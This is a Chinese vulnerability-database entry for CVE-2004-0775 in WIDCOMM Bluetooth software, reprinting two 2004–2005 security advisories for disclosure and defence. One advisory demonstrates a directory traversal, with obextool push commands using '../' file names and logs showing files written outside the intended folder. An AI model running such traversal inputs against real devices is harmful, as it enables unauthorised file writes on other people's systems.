CVE-2004-0775
CVSS7.5
发布时间 :2004-10-20 00:00:00
修订时间 :2016-10-17 22:48:55
NMCOPS    

[原文]Buffer overflow in WIDCOMM Bluetooth Connectivity Software, as used in products such as BTStackServer 1.3.2.7 and 1.4.2.10, Windows XP and Windows 98 with MSI Bluetooth Dongles, and HP IPAQ 5450 running WinCE 3.0, allows remote attackers to execute arbitrary code via certain service requests.


[CNNVD]WIDCOMM蓝牙连接软件缓冲区溢出漏洞(CNNVD-200410-070)

        
        WIDCOMM产品提供多种设备的蓝牙连接解决方案。
        WIDCOMM产品对通过蓝牙的各种畸形服务请求缺少正确处理,远程攻击者可以利用这个漏洞触发缓冲区溢出攻击,可能在设备以进程权限执行任意指令。
        目前没有详细细节提供。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:widcomm:bluetooth_communication_software:1.4.1.03
cpe:/a:widcomm:btstackserver:1.3.2.7
cpe:/a:widcomm:btstackserver:1.4.2.10

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0775
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0775
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-070
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0029.html
(UNKNOWN)  VULNWATCH  20040811 ptl-2004-03: WIDCOMM Bluetooth Connectivity Software Buffer Overflows
http://marc.info/?l=bugtraq&m=109223783402624&w=2
(UNKNOWN)  BUGTRAQ  20040811 ptl-2004-03: WIDCOMM Bluetooth Connectivity Software Buffer Overflows
http://www.internetnews.com/security/article.php/3394181
(UNKNOWN)  MISC  http://www.internetnews.com/security/article.php/3394181
http://www.pentest.co.uk/documents/ptl-2004-03.html
(VENDOR_ADVISORY)  MISC  http://www.pentest.co.uk/documents/ptl-2004-03.html
http://www.securityfocus.com/archive/1/archive/1/418633/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051204 have you ever been BluePIMped?
http://xforce.iss.net/xforce/xfdb/16953
(VENDOR_ADVISORY)  XF  bluetooth-btw-service-bo(16953)

- 漏洞信息

WIDCOMM蓝牙连接软件缓冲区溢出漏洞
高危 边界条件错误
2004-10-20 00:00:00 2005-10-20 00:00:00
远程  
        
        WIDCOMM产品提供多种设备的蓝牙连接解决方案。
        WIDCOMM产品对通过蓝牙的各种畸形服务请求缺少正确处理,远程攻击者可以利用这个漏洞触发缓冲区溢出攻击,可能在设备以进程权限执行任意指令。
        目前没有详细细节提供。
        

- 公告与补丁

        厂商补丁:
        WIDCOMM
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载3.0版本:
        
        http://www.widcomm.com

- 漏洞信息 (F37213)

DMA_2005-0412a_.txt (PacketStormID:F37213)
2005-04-20 00:00:00
Kevin Finisterre  digitalmunition.com
advisory
CVE-2004-0775
[点击下载]

WIDCOMM Bluetooth Connectivity Software is vulnerable to a directory traversal exploit.

DMA[2005-0412a] - 'Widcomm BTW (Microsoft Windows BT stack) Directory Transversal'
Author: Kevin Finisterre
Vendor: http://66.45.42.84/Products, http://www.broadcom.com/press/release.php?id=525262
Product: 'versions older than BTW 3.0.1.905 ?'
References: http://www.digitalmunition.com/DMA[2005-0412a].txt

Description: 
On August 11 2004 in Advisory Reference ptl-2004-03 Pentest Limited released very minimal 
detail on security issues related to 'WIDCOMM Bluetooth Connectivity Software'. CAN-2004-0775
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0775 was created in order to 
provide information surrounding this issue. Unfortunately none of the links provided by the
CVE entry contain any real data on the attacks. In efforts to document and exploit the 
above mentioned issues I stumbled upon yet an other problem. 

WIDCOMM Inc. which is short for Wireless Internet and Data/Voice Communications previously designed
products for indoor wireless communications. Founded in June 1998, the company was focused on 
Bluetooth networking. WIDCOMM's goal was to make it secure, easy, and inexpensive for people with 
PCs, cellular phones, PDAs and laptops to wirelessly link their devices and to access the Internet. 

One May 10 2004 Broadcom Corporation, a leading provider of highly integrated semiconductor 
solutions enabling broadband communications, announced that had completed the acquisition of WIDCOMM.

I happen to own Bluetooth dongles from Belkin, Actiontec, Linksys, Ambicom, D-link and Zoom and only 
one of them came with BlueSoleil instead of Widcomm based software. I would guess that somewhere 
around 90% of the PC Bluetooth hardware on the market currently comes with Widcomm install media. 

The dongle that I used for testing was an Ambicom BT2000C-US on windows XP SP2. The software that 
was bundled with the dongle was a variant of Widcomm's Bluetooth Software version 1.4.2. Several 
other revisions are available however due to problems with licensing you may find it difficult to 
make use of anything that did not specifically come packaged with your device. I even ran into an 
instance in which my purchased dongle did not even work with the software it was bundled with 
(Thanks D-Link!). 

Several sites document the difficulties that the end user is faced with when trying to use the various
versions of the Widcomm software. Short of stating that Widcomm and Broadcomm have really done a huge 
disservice to their end users, I will not go into the fiasco surrounding license.dat issues. Fixing 
and or patching the vulnerabilities I am going to mention may be compounded by the fact that Widcomm
and Broadcomm's customer base is simply unable to upgrade. Widcomm has in essence shot us all in the 
foot.  

After an install of the Widcomm software you are presented with the 'Initial Bluetooth Configuration'
screen. Here you choose the name of your device and select the bluetooth services it will provide. 
By default 'PIM Item Transfer' is set to start automatically with no authentication required. Under
normal circumstances files are dropped into "<My Documents>\Bluetooth Exchange Folder". Any device 
that attempts to transfer files to or from your device should be limited to accessing this folder. 

Unfortunately this is NOT the case, a simple ../ is enough to cause a little trouble. This attack can
have its limitations depending on how the software settings are configured. Using a modified obextool 
binary from ussp-push we can easily demonstrate the problem. 

As stated above a normal transaction should limit files to the "<My Documents>\Bluetooth Exchange Folder"

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE testfile 3
Sending object ...

BtserverSpylite output: 
00:32:17.995 OPP:  Settings for saving objects...
00:32:18.015       vCard's: 'Save to PIM'
00:32:18.035       vCal's:  'Do not accept'
00:32:18.055       vMsg's:  'Do not accept'
00:32:18.075       vNote's: 'Do not accept'
00:32:18.095       Other:   'Save to Inbox folder'
00:32:18.115       Folder:  'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder\'
00:32:18.135 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:32:18.155 OPP:  'testfile' saved to PIM Item Transfer Folder '...My Documents\Bluetooth Exchange Folder'


C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder>dir
 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder

07/12/2005  12:32 AM    <DIR>          .
07/12/2005  12:32 AM    <DIR>          ..
07/12/2005  12:32 AM               262 testfile
               1 File(s)            262 bytes
               2 Dir(s)  35,701,919,744 bytes free

We are however able to travel beyond the Bluetooth Exchange Folder by adding "../" to our request. Under the 
default configuration this allows us to write to the root of the My Documents folder. 

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE ../Im_rick_james 3
Sending object ...

00:35:19.897 OPP:  '../Im_rick_james' saved to PIM Item Transfer Folder '...\My Documents\Bluetooth Exchange Folder'

C:\Documents and Settings\Administrator\My Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\Documents and Settings\Administrator\My Documents

07/12/2005  12:35 AM    <DIR>          .
07/12/2005  12:35 AM    <DIR>          ..
07/12/2005  12:35 AM               262 Im_rick_james
07/01/2005  08:38 PM    <DIR>          Bluetooth
07/12/2005  12:32 AM    <DIR>          Bluetooth Exchange Folder
07/01/2005  04:38 PM    <DIR>          My Music
06/25/2005  02:55 PM    <DIR>          My Pictures
06/27/2005  12:08 AM    <DIR>          My Virtual Machines
               1 File(s)            262 bytes
               7 Dir(s)  35,701,919,744 bytes free

Due to an unknown reason, when using the default configuration you are only able to go up one 
directory. Because of this you are limited to being able to write to the My Documents folder ONLY. 
his could be an XP SP2 thing. I have NOT tested this on windows 9x based software at all. In other
words your results may vary. 

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE ../../beiotch 3            
Sending object ...
00:37:25.457 OPP:  Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../beiotch' to 
'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder\../../beiotch'

If you change the default drop directory from "<My Documents>\Bluetooth Exchange Folder" to something
else we are able to traverse a good portion of the file system. In this example we used 
C:\test\test2\test3\test4 as our bluetooth drop folder. 

00:57:38.471 OPP:  Settings for saving objects...
00:57:38.481       vCard's: 'Save to PIM'
00:57:38.501       vCal's:  'Do not accept'
00:57:38.511       vMsg's:  'Do not accept'
00:57:38.532       vNote's: 'Do not accept'
00:57:38.542       Other:   'Save to Inbox folder'
00:57:38.562       Folder:  'C:\test\test2\test3\test4'
00:57:38.582 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:57:38.602 OPP:  '../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'

00:57:38.672 GKI freeq 0 (2:4) 1 (0:1) 2 (0:0) 3 (1:12) 4 (0:46)
00:57:57.599 OPP:  Settings for saving objects...
00:57:57.609       vCard's: 'Save to PIM'
00:57:57.629       vCal's:  'Do not accept'
00:57:57.649       vMsg's:  'Do not accept'
00:57:57.669       vNote's: 'Do not accept'
00:57:57.679       Other:   'Save to Inbox folder'
00:57:57.699       Folder:  'C:\test\test2\test3\test4'
00:57:57.719 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:57:57.739 OPP:  '../../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'

00:58:14.243 OPP:  Settings for saving objects...
00:58:14.263       vCard's: 'Save to PIM'
00:58:14.283       vCal's:  'Do not accept'
00:58:14.293       vMsg's:  'Do not accept'
00:58:14.313       vNote's: 'Do not accept'
00:58:14.333       Other:   'Save to Inbox folder'
00:58:14.343       Folder:  'C:\test\test2\test3\test4'
00:58:14.363 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:58:14.383 OPP:  '../../../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'

Again for some reason we run into a minor limitation on where the files can be dropped. 

00:58:29.735 OPP:  Settings for saving objects...
00:58:29.755       vCard's: 'Save to PIM'
00:58:29.775       vCal's:  'Do not accept'
00:58:29.795       vMsg's:  'Do not accept'
00:58:29.815       vNote's: 'Do not accept'
00:58:29.835       Other:   'Save to Inbox folder'
00:58:29.855       Folder:  'C:\test\test2\test3\test4'
00:58:29.875 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:58:29.895 OPP:  Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../../../blah' to 
'C:\test\test2\test3\test4\../../../../blah'

As you can see the bluetooth drop directory can easily be ignored by the attacker. 

C:\>dir test\blah test\test2\blah test\test2\test3\blah 

 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\test

07/12/2005  12:58 AM               262 blah
               1 File(s)            262 bytes

 Directory of C:\test\test2

07/12/2005  12:57 AM               262 blah
               1 File(s)            262 bytes

 Directory of C:\test\test2\test3

07/12/2005  12:57 AM               262 blah
               1 File(s)            262 bytes


I have not seen this issue documented anywhere. It was not described in the release by pentest.co.uk, 
nor was it mentioned in any advisory from Widcomm or Broadcomm. I am unable to tell exactly when this 
issue was introduced into the Widcomm codebase and I am equally unable to tell exactly when it was 
fixed. All of the above testing was performed against PC versions of the software, it is currently 
unknown how other Widcomm platforms are affected by this issue. 

I have confirmed that versions 4.0.1.700 and 3.0.1.905 are NOT exploitable (for this condition). In 
these versions the "../" request is replaced with "..x" thus preventing the attack. 

Timeline associated with this bug:
04/12/2005 Public disclosure due to the fact that the bug was silently fixed by the vendor(s) in the past.

Regurgitated Workaround:
'...(we) recommend that end users stop using the vulnerable WIDCOMM Bluetooth software'. Alternately
users can 'set their Bluetooth device configuration to be non-discoverable or hidden.'. Please note 
however 'This will not stop the device from being vulnerable but it may limit the exposure.' 

Due to the fact that this issue was patched silently NO attempt was made to notify Broadcomm or Widcomm 
about this issue. The issue appears to have been patched in version 3.x. Unfortunately due to licensing 
issues users of this software will find it difficult to patch this vulnerability, and I found it difficult
to research which versions were and were not vulnerable. Bug your vendor to get you some updated software 
and ask them to quit playing games over license.dat files! 

Other vendors are affected by similar issues and future advisories will be released. 

All your Bluetooth are belong to greenplaque. 

-KF


    

- 漏洞信息 (F34022)

ptl-2004-03.txt (PacketStormID:F34022)
2004-08-12 00:00:00
Matt Moore,Mark Rowe  pentest.co.uk
advisory,remote,overflow,arbitrary
CVE-2004-0775
[点击下载]

An unauthenticated remote attacker can submit various malformed service requests via Bluetooth, triggering a buffer overflow and executing arbitrary code on vulnerable devices using WIDCOMM Bluetooth Connectivity Software. All releases prior to 3.0 are affected.

Pentest Limited Security Advisory

WIDCOMM Bluetooth Connectivity Software Buffer Overflows

Advisory Details
----------------
Title: WIDCOMM Bluetooth Connectivity Software Buffer Overflows
Announcement date: 11 August 2004
Advisory Reference: ptl-2004-03
CVE Name: CAN-2004-0775
Products: WIDCOMM Bluetooth Connectivity Software
Vulnerability Type : Buffer Overflow
Vendor-URL: http://www.widcomm.com
Vendor-Status: Fixed in release 3.0
Remotely Exploitable: Yes
Locally Exploitable: N/A
Advisory URL: http://www.pentest.co.uk/documents/ptl-2004-03.html

Vulnerability Description
--------------------------
WIDCOMM's products provides a full range of Bluetooth connectivity
solutions for PCs, PDAs, mobile phones, headsets, digital cameras,
access points, and various output devices.

An unauthenticated remote attacker can submit various malformed service
requests via Bluetooth, triggering a buffer overflow and executing
arbitrary code on the vulnerable device.

On Windows platforms this allows arbitrary code execution under the
context of the currently logged on user account.


Vulnerable Versions
--------------------

WIDCOMM supply their Bluetooth Communications software to other
companies to allow them to integrate Bluetooth technology into their
devices. They also supply Bluetooth SDK's to enable developers to create
applications that use Bluetooth. Therefore it may not be immediately
apparent that you are using the WIDCOMM Bluetooth software and version
numbers may vary.

WIDCOMM's website (http://www.widcomm.com/Partners/index.asp) reports
the following companies as customers or partners with WIDCOMM:

Logitech
Samsung Electro-Mechanics
Sony
Texas Instruments
Compaq Computer Corporation
Dell
National Semiconductor
Matsushita Electric Industrial Co., Ltd.
Wistron NeWeb Corporation
TDK Systems Europe
Zeevo
Cambridge Silicon Radio
Billionton
Broadcom Corporation
LG Innotek
MSI
Fujitsu Siemens Computers
Philips
Silicon Wave
Seiko Instruments Inc.
TECOM
Plantronics
Mobilian
Fujitsu Media Devices Limited
OKI Electric Industry Co. Ltd.
FIC
Costar
Brother
Alcatel
Atmel
Conexant Systems, Inc.
Microtune
OSK


Pentest Limited have tested for the reported vulnerabilities against
BTStackServer version 1.3.2.7 and 1.4.2.10  on both Windows XP and
Windows 98 which ships with MSI Bluetooth Dongles. We have also tested
this against an HP IPAQ 5450 running WinCE 3.0 with Bluetooth software
version 1.4.1.03.

Pentest Limited have also written a proof of concept exploit for Windows
XP.

Whilst the above platforms are the only platforms tested and confirmed
to be exploitable by Pentest Limited, discussions with the vendor lead
us to believe that are all versions prior to version BTW & BT-CE/PPC 3.0
are affected by this vulnerability.

WIDCOMM has not confirmed whether BT-PPC/Phone Edition, BT-Smartphone,
BTE-Mobile or BTE are vulnerable.


Vendor Status
--------------
WIDCOMM:
14-11-2003 - Initial Pentest Limited Notification
14-11-2003 - Notification acknowledged by WIDCOMM, request more detail
20-11-2003 - Pentest notify WIDCOMM of another vulnerability
06-01-2004 - Pentest send chase up Email without reply
13-01-2004 - Another email
13-01-2004 - WIDCOMM reply saying they are still working on it
21-01-2004 - Pentest email WIDCOMM that they have written a POC exploit
23-01-2004 - WIDCOMM reply saying they have resolved issue and fix
	     will be available in next release.
10-02-2004 - Pentest ask for an update on expected release date
11-02-2004 - WIDCOMM plan February/early March realease date
29-03-2004 - Pentest ask for update
12-05-2004 - Pentest ask for update
12-07-2004 - Pentest send chase up Email without reply
26-07-2004 - Pentest ask whether a patches will be released for older 
versions
03-08-2004 - WIDCOMM respond. No date set for new release and no patch
	     will be made available for older versions.


Fix
---

Until version 3 of the WIDCOMM software becomes available from WIDCOMM
or their customers/partners Pentest Limited recommend that end users
stop using the vulnerable WIDCOMM Bluetooth software or set their
Bluetooth device configuration to be non-discoverable or hidden. This
will not stop the device from being vulnerable but it may limit the
exposure.


Credit
------

These vulnerabilities were discovered by Mark Rowe and Matt Moore from
Pentest Limited.
    

- 漏洞信息

8603
WIDCOMM Bluetooth Malformed Service Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

A remote overflow exists in WIDCOMM Bluetooth Connectivity Software. The WIDCOMM Bluetooth Connectivity Software fails to properly sanitize service requests resulting in a buffer overflow. With a specially crafted service request, an attacker can cause arbitrary commands to be executed resulting in a loss of integrity.

- 时间线

2004-08-11 2003-11-14
Unknow Unknow

- 解决方案

Upgrade to version 3.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

WIDCOMM Bluetooth Communication Software Multiple Unspecified Buffer Overflow Vulnerabilities
Boundary Condition Error 10914
Yes No
2004-08-11 12:00:00 2009-07-12 06:16:00
Discovery is credited to Mark Rowe and Matt Moore of Pentest Limited.

- 受影响的程序版本

WIDCOMM BTStackServer 1.4.2 .10
WIDCOMM BTStackServer 1.3.2 .7
WIDCOMM Bluetooth Communication Software 1.4.1 .03
+ HP IPAQ 2215
+ HP IPAQ 5450
WIDCOMM BTW
WIDCOMM BT-CE/PPC 3.0

- 不受影响的程序版本

WIDCOMM BTW
WIDCOMM BT-CE/PPC 3.0

- 漏洞讨论

WIDCOMM Bluetooth Communication Software is susceptible to multiple unspecified remote buffer overflow vulnerabilities. These vulnerabilities exist due to insufficient boundary checks performed by the application.

An unauthenticated remote attacker can trigger an overflow conditions by supplying malformed service requests.

Various devices from multiple vendors are thought to be affected by these issues, as they are implemented with WIDCOMM software. These issues have been verified by the researchers in BTStackServer version 1.3.2.7 and 1.4.2.10 running on Microsoft Windows XP and Windows 98. HP IPAQ 5450 running WinCE 3.0 with Bluetooth software version 1.4.1.03 is reported prone as well.

WIDCOMM Bluetooth Communication Software BTW &amp; BT-CE/PPC 3.0 do not appear to be affected by these issues.

- 漏洞利用

The researchers responsible for discovering these issues have developed a proof of concept to trigger the vulnerabilities. This proof of concept is not available to the public at the moment.

KF &lt;kf_lists@digitalmunition.com&gt; has created an exploit for one of these issues. A patch to alter ussp-push-0.4 is provided in the referenced email from KF, "have you ever been BluePIMped?".

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站